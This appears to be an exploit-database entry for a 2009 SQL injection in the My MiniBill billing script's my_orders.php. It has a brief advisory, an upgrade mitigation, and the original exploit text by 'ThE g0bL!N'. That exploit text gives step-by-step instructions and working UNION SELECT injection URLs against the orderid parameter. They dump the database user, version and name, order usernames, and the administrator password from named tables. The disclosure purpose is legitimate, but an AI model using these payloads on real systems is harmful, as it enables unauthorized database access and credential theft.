My MiniBill (my_orders.php) Remote SQL Injection

vendor:

My MiniBill

by:

ThE g0bL!N

CVSS

HIGH

SQL Injection

CWE

Product Name: My MiniBill

Affected Version From: Prior to 1.0.1

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: a:cupidsystems:myminibill

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

My MiniBill (my_orders.php) Remote SQL Injection

My MiniBill is prone to a remote SQL injection vulnerability. An attacker can exploit this issue to manipulate SQL queries and gain access to sensitive information that may aid in further attacks. This issue affects versions prior to My MiniBill 1.0.1.

Mitigation:

Upgrade to version 1.0.1 or later.

Source

Exploit-DB raw data:

My MiniBill (my_orders.php) Remote SQL Injection
Founder: ThE g0bL!N
------
Home: http:/www.4ckx.com/dz/
----
Vendor:http://cupidsystems.com
------
More info:http://cupidsystems.com/products/myminibill/index.php
--------
Note: First You must register in the site  [path]/register.php
Then Go To exploit:
------------------
http://victim/[path]/my_orders.php?action=status&orderid=-68+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9--
Login Information:
-----------------
For:
username: http://site/my_orders.php?action=status&orderid=-68+union+select+1,2,3,username,5,6,7,8,9+from+dbminibill.tblorders+limit+0,1
Password: http://site/my_orders.php?action=status&orderid=-68+union+select+1,2,3,adminpassword,5,6,7,8,9+from+tblgeneral
Demo:
http://cupidsystems.com/products/myminibill/demo/
Note: ALgerie en Coupe Du Monde In shaa ALLAH*
################################################################################################

# milw0rm.com [2009-06-03]